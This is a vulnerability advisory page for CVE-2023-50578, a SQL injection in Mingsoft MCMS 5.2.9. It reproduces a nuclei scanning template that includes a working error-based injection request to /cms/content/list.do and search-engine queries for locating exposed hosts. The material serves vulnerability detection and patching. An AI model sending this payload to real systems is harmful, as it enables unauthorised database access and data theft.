CVE-2023-50578: Mingsoft MCMS 5.2.9 - SQL Injection

日期: 2025-08-01 | 影响软件: Mingsoft MCMS | POC: 已公开

漏洞描述

Mingsoft MCMS v5.2.9 contains a SQL injection caused by unsanitized categoryType parameter at /content/list.do, letting attackers execute arbitrary SQL commands, exploit requires crafted input.

PoC代码[已公开]

id: CVE-2023-50578

info:
  name: Mingsoft MCMS 5.2.9 - SQL Injection
  author: ritikchaddha
  severity: critical
  description: |
    Mingsoft MCMS v5.2.9 contains a SQL injection caused by unsanitized categoryType parameter at /content/list.do, letting attackers execute arbitrary SQL commands, exploit requires crafted input.
  impact: |
    Attackers can execute arbitrary SQL commands, potentially leading to data leakage, modification, or deletion.
  remediation: |
    Update to the latest version of Mingsoft MCMS or apply security patches that sanitize input parameters.
  reference:
    - https://gitee.com/mingSoft/MCMS/issues/I8MAJK
    - https://nvd.nist.gov/vuln/detail/CVE-2023-50578
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-50578
    cwe-id: CWE-89
    epss-score: 0.31687
    epss-percentile: 0.96589
    cpe: cpe:2.3:a:mingsoft:mcms:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: mingsoft
    product: mcms
    shodan-query: http.favicon.hash:1464851260
    fofa-query: icon_hash="1464851260"
  tags: cve,cve2023,mingsoft,mcms,sqli,vuln

variables:
  num: "999999999"

http:
  - raw:
      - |
        POST /cms/content/list.do HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        categoryType=1&sqlWhere=%5b%7b%22action%22%3a%22and%22%2c%22field%22%3a%22updatexml(1%2cconcat(0x7e%2cmd5({{num}})%2c0x7e)%2c1)%22%2c%22el%22%3a%22eq%22%2c%22model%22%3a%22contentTitle%22%2c%22name%22%3a%22%C3%A6%C2%96%C2%87%C3%A7%C2%AB%20%C3%A6%20%C2%87%C3%A9%C2%A2%C2%98%22%2c%22type%22%3a%22input%22%2c%22value%22%3a%22111%22%7d%5d&pageNo=1&pageSize=10

    matchers:
      - type: word
        part: body
        words:
          - "c8c605999f3d8352d7bb792cf3fdb25"
# digest: 4b0a00483046022100f5dca6518aeb3c984a7d90823dee5a538a8f07e28c044a22e7a472f447531829022100a18e61d8c7fc4c812f8744f69ade3b1152e9a58dcd5f193a7a562050054c1988:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2023/CVE-2023-50578.yaml

相关漏洞推荐